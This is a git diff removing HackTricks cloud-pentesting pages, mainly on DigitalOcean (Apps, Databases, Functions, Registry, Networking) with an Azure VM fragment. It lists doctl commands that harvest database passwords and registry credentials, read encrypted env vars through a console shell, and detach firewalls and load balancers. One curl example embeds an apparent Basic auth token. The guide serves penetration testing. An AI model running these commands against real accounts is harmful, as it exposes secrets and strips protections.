-{% endhint %} - -## Virtual Machines - -For more info about Azure Virtual Machines check: - -{% content-ref url="../az-services/vms/" %} -[vms](../az-services/vms/) -{% endcontent-ref %} - -### Exposed vulnerable service - -A network service that is vulnerable to some RCE. - -### Public Gallery Images - -A public image might have secrets inside of it: - -{% code overflow="wrap" %} -```bash -# List all community galleries -az sig list-community --output table - -# Search by publisherUri -az sig list-community --output json --query "[?communityMetadata.publisherUri=='https://3nets.io']" -``` -{% endcode %} - -### Public Extensions - -This would be more weird but not impossible. A big company might put an extension with sensitive data inside of it: - -```bash -# It takes some mins to run -az vm extension image list --output table - -# Get extensions by publisher -az vm extension image list --publisher "Site24x7" --output table -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/digital-ocean-pentesting/README.md b/pentesting-cloud/digital-ocean-pentesting/README.md deleted file mode 100644 index 66f82c478..000000000 --- a/pentesting-cloud/digital-ocean-pentesting/README.md +++ /dev/null @@ -1,67 +0,0 @@ -# Digital Ocean Pentesting - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -**Before start pentesting** a Digital Ocean environment there are a few **basics things you need to know** about how DO works to help you understand what you need to do, how to find misconfigurations and how to exploit them. - -Concepts such as hierarchy, access and other basic concepts are explained in: - -{% content-ref url="do-basic-information.md" %} -[do-basic-information.md](do-basic-information.md) -{% endcontent-ref %} - -## Basic Enumeration - -### SSRF - -{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf" %} - -### Projects - -To get a list of the projects and resources running on each of them from the CLI check: - -{% content-ref url="do-services/do-projects.md" %} -[do-projects.md](do-services/do-projects.md) -{% endcontent-ref %} - -### Whoami - -```bash -doctl account get -``` - -## Services Enumeration - -{% content-ref url="do-services/" %} -[do-services](do-services/) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/digital-ocean-pentesting/do-permissions-for-a-pentest.md b/pentesting-cloud/digital-ocean-pentesting/do-permissions-for-a-pentest.md deleted file mode 100644 index 3333a417c..000000000 --- a/pentesting-cloud/digital-ocean-pentesting/do-permissions-for-a-pentest.md +++ /dev/null @@ -1,33 +0,0 @@ -# DO - Permissions for a Pentest - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -DO doesn't support granular permissions. So the **minimum role** that allows a user to review all the resources is **member**. A pentester with this permission will be able to perform harmful activities, but it's what it's. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/digital-ocean-pentesting/do-services/README.md b/pentesting-cloud/digital-ocean-pentesting/do-services/README.md deleted file mode 100644 index 5df4185ea..000000000 --- a/pentesting-cloud/digital-ocean-pentesting/do-services/README.md +++ /dev/null @@ -1,45 +0,0 @@ -# DO - Services - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -DO offers a few services, here you can find how to **enumerate them:** - -* [**Apps**](do-apps.md) -* [**Container Registry**](do-container-registry.md) -* [**Databases**](do-databases.md) -* [**Droplets**](do-droplets.md) -* [**Functions**](do-functions.md) -* [**Images**](do-images.md) -* [**Kubernetes (DOKS)**](do-kubernetes-doks.md) -* [**Networking**](do-networking.md) -* [**Projects**](do-projects.md) -* [**Spaces**](do-spaces.md) -* [**Volumes**](do-volumes.md) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.md b/pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.md deleted file mode 100644 index f10dcde2f..000000000 --- a/pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.md +++ /dev/null @@ -1,61 +0,0 @@ -# DO - Apps - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -[From the docs:](https://docs.digitalocean.com/glossary/app-platform/) App Platform is a Platform-as-a-Service (PaaS) offering that allows developers to **publish code directly to DigitalOcean** servers without worrying about the underlying infrastructure. - -You can run code directly from **github**, **gitlab**, **docker hub**, **DO container registry** (or a sample app). - -When defining an **env var** you can set it as **encrypted**. The only way to **retreive** its value is executing **commands** inside the host runnig the app. - -An **App URL** looks like this [https://dolphin-app-2tofz.ondigitalocean.app](https://dolphin-app-2tofz.ondigitalocean.app) - -### Enumeration - -```bash -doctl apps list # You should get URLs here -doctl apps spec get # Get yaml (including env vars, might be encrypted) -doctl apps logs # Get HTTP logs -doctl apps list-alerts # Get alerts -doctl apps list-regions # Get available regions and the default one -``` - -{% hint style="danger" %} -**Apps doesn't have metadata endpoint** -{% endhint %} - -### RCE & Encrypted env vars - -To execute code directly in the container executing the App you will need **access to the console** and go to **`https://cloud.digitalocean.com/apps//console/`**. - -That will give you a **shell**, and just executing **`env`** you will be able to see **all the env vars** (including the ones defined as **encrypted**). - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.md b/pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.md deleted file mode 100644 index 72897f1e7..000000000 --- a/pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.md +++ /dev/null @@ -1,59 +0,0 @@ -# DO - Container Registry - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -DigitalOcean Container Registry is a service provided by DigitalOcean that **allows you to store and manage Docker images**. It is a **private** registry, which means that the images that you store in it are only accessible to you and users that you grant access to. This allows you to securely store and manage your Docker images, and use them to deploy containers on DigitalOcean or any other environment that supports Docker. - -When creating a Container Registry it's possible to **create a secret with pull images access (read) over it in all the namespaces** of Kubernetes clusters. - -### Connection - -```bash -# Using doctl -doctl registry login - -# Using docker (You need an API token, use it as username and as password) -docker login registry.digitalocean.com -Username: -Password: -``` - -### Enumeration - -```bash -# Get creds to access the registry from the API -doctl registry docker-config - -# List -doctl registry repository list-v2 -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.md b/pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.md deleted file mode 100644 index d31d67c7b..000000000 --- a/pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.md +++ /dev/null @@ -1,71 +0,0 @@ -# DO - Databases - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -With DigitalOcean Databases, you can easily **create and manage databases in the cloud** without having to worry about the underlying infrastructure. The service offers a variety of database options, including **MySQL**, **PostgreSQL**, **MongoDB**, and **Redis**, and provides tools for administering and monitoring your databases. DigitalOcean Databases is designed to be highly scalable, reliable, and secure, making it an ideal choice for powering modern applications and websites. - -### Connections details - -When creating a database you can select to configure it **accessible from a public network**, or just from inside a **VPC**. Moreover, it request you to **whitelist IPs that can access it** (your IPv4 can be one). - -The **host**, **port**, **dbname**, **username**, and **password** are shown in the **console**. You can even download the AD certificate to connect securely. - -{% code overflow="wrap" %} -```bash -sql -h db-postgresql-ams3-90864-do-user-2700959-0.b.db.ondigitalocean.com -U doadmin -d defaultdb -p 25060 -``` -{% endcode %} - -### Enumeration - -```bash -# Databse clusters -doctl databases list - -# Auth -doctl databases get # This shows the URL with CREDENTIALS to access -doctl databases connection # Another way to egt credentials -doctl databases user list # Get all usernames and passwords - -# Dbs inside a database cluster -doctl databases db list - -# Firewall (allowed IPs), you can also add -doctl databases firewalls list - -# Backups -doctl databases backups # List backups of DB - -# Pools -doctl databases pool list # List pools of DB -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.md b/pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.md deleted file mode 100644 index ad37aa951..000000000 --- a/pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.md +++ /dev/null @@ -1,88 +0,0 @@ -# DO - Functions - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -DigitalOcean Functions, also known as "DO Functions," is a serverless computing platform that lets you **run code without having to worry about the underlying infrastructure**. With DO Functions, you can write and deploy your code as "functions" that can be **triggered** via **API**, **HTTP requests** (if enabled) or **cron**. These functions are executed in a fully managed environment, so you **don't need to worry** about scaling, security, or maintenance. - -In DO, to create a function first you need to **create a namespace** which will be **grouping functions**.\ -Inside the namespace you can then create a function. - -### Triggers - -The way **to trigger a function via REST API** (always enabled, it's the method the cli uses) is by triggering a request with an **authentication token** like: - -```bash -curl -X POST "https://faas-lon1-129376a7.doserverless.co/api/v1/namespaces/fn-c100c012-65bf-4040-1230-2183764b7c23/actions/functionname?blocking=true&result=true" \ - -H "Content-Type: application/json" \ - -H "Authorization: Basic MGU0NTczZGQtNjNiYS00MjZlLWI2YjctODk0N2MyYTA2NGQ4OkhwVEllQ2t4djNZN2x6YjJiRmFGc1FERXBySVlWa1lEbUxtRE1aRTludXA1UUNlU2VpV0ZGNjNqWnVhYVdrTFg=" -``` - -To see how is the **`doctl`** cli tool getting this token (so you can replicate it), the **following command shows the complete network trace:** - -```bash -doctl serverless connect --trace -``` - -**When HTTP trigger is enabled**, a web function can be invoked through these **HTTP methods GET, POST, PUT, PATCH, DELETE, HEAD and OPTIONS**. - -{% hint style="danger" %} -In DO functions, **environment variables cannot be encrypted** (at the time of this writing).\ -I couldn't find any way to read them from the CLI but from the console it's straight forward. 
-{% endhint %} - -**Functions URLs** look like this: `https://.doserverless.co/api/v1/web//default/` - -### Enumeration - -```bash -# Namespace -doctl serverless namespaces list - -# Functions (need to connect to a namespace) -doctl serverless connect -doctl serverless functions list -doctl serverless functions invoke -doctl serverless functions get - -# Logs of executions -doctl serverless activations list -doctl serverless activations get # Get all the info about execution -doctl serverless activations logs # get only the logs of execution -doctl serverless activations result # get only the response result of execution - -# I couldn't find any way to get the env variables form the CLI -``` - -{% hint style="danger" %} -There **isn't metadata endpoint** from the Functions sandbox. -{% endhint %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/digital-ocean-pentesting/do-services/do-images.md b/pentesting-cloud/digital-ocean-pentesting/do-services/do-images.md deleted file mode 100644 index eaba5349d..000000000 --- a/pentesting-cloud/digital-ocean-pentesting/do-services/do-images.md +++ /dev/null @@ -1,45 +0,0 @@ -# DO - Images - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -DigitalOcean Images are **pre-built operating system or application images** that can be used to create new Droplets (virtual machines) on DigitalOcean. They are similar to virtual machine templates, and they allow you to **quickly and easily create new Droplets with the operating system** and applications that you need. - -DigitalOcean provides a wide range of Images, including popular operating systems such as Ubuntu, CentOS, and FreeBSD, as well as pre-configured application Images such as LAMP, MEAN, and LEMP stacks. You can also create your own custom Images, or use Images from the community. - -When you create a new Droplet on DigitalOcean, you can choose an Image to use as the basis for the Droplet. This will automatically install the operating system and any pre-installed applications on the new Droplet, so you can start using it right away. Images can also be used to create snapshots and backups of your Droplets, so you can easily create new Droplets from the same configuration in the future. - -### Enumeration - -``` -doctl compute image list -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.md b/pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.md deleted file mode 100644 index d91a05f1d..000000000 --- a/pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.md +++ /dev/null @@ -1,65 +0,0 @@ -# DO - Kubernetes (DOKS) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -### DigitalOcean Kubernetes (DOKS) - -DOKS is a managed Kubernetes service offered by DigitalOcean. The service is designed to **deploy and manage Kubernetes clusters on DigitalOcean's platform**. The key aspects of DOKS include: - -1. **Ease of Management**: The requirement to set up and maintain the underlying infrastructure is eliminated, simplifying the management of Kubernetes clusters. -2. **User-Friendly Interface**: It provides an intuitive interface that facilitates the creation and administration of clusters. -3. **Integration with DigitalOcean Services**: It seamlessly integrates with other services provided by DigitalOcean, such as Load Balancers and Block Storage. -4. **Automatic Updates and Upgrades**: The service includes the automatic updating and upgrading of clusters to ensure they are up-to-date. - -### Connection - -```bash -# Generate kubeconfig from doctl -doctl kubernetes cluster kubeconfig save - -# Use a kubeconfig file that you can download from the console -kubectl --kubeconfig=//k8s-1-25-4-do-0-ams3-1670939911166-kubeconfig.yaml get nodes -``` - -### Enumeration - -```bash -# Get clusters -doctl kubernetes cluster list - -# Get node pool of cluster (number of nodes) -doctl kubernetes cluster node-pool list - -# Get DO resources used by the cluster -doctl kubernetes cluster list-associated-resources -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.md b/pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.md deleted file mode 100644 index 29cf44eb1..000000000 --- a/pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.md +++ /dev/null @@ -1,72 +0,0 @@ -# DO - Networking - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -### Domains - -```bash -doctl compute domain list -doctl compute domain records list -# You can also create records -``` - -### Reserverd IPs - -```bash -doctl compute reserved-ip list -doctl compute reserved-ip-action unassign -``` - -### Load Balancers - -```bash -doctl compute load-balancer list -doctl compute load-balancer remove-droplets --droplet-ids 12,33 -doctl compute load-balancer add-forwarding-rules --forwarding-rules entry_protocol:tcp,entry_port:3306,... -``` - -### VPC - -``` -doctl vpcs list -``` - -### Firewall - -{% hint style="danger" %} -By default **droplets are created WITHOUT A FIREWALL** (not like in oder clouds such as AWS or GCP). So if you want DO to protect the ports of the droplet (VM), you need to **create it and attach it**. -{% endhint %} - -```bash -doctl compute firewall list -doctl compute firewall list-by-droplet -doctl compute firewall remove-droplets --droplet-ids -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/digital-ocean-pentesting/do-services/do-projects.md b/pentesting-cloud/digital-ocean-pentesting/do-services/do-projects.md deleted file mode 100644 index bc82b2449..000000000 --- a/pentesting-cloud/digital-ocean-pentesting/do-services/do-projects.md +++ /dev/null @@ -1,49 +0,0 @@ -# DO - Projects - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
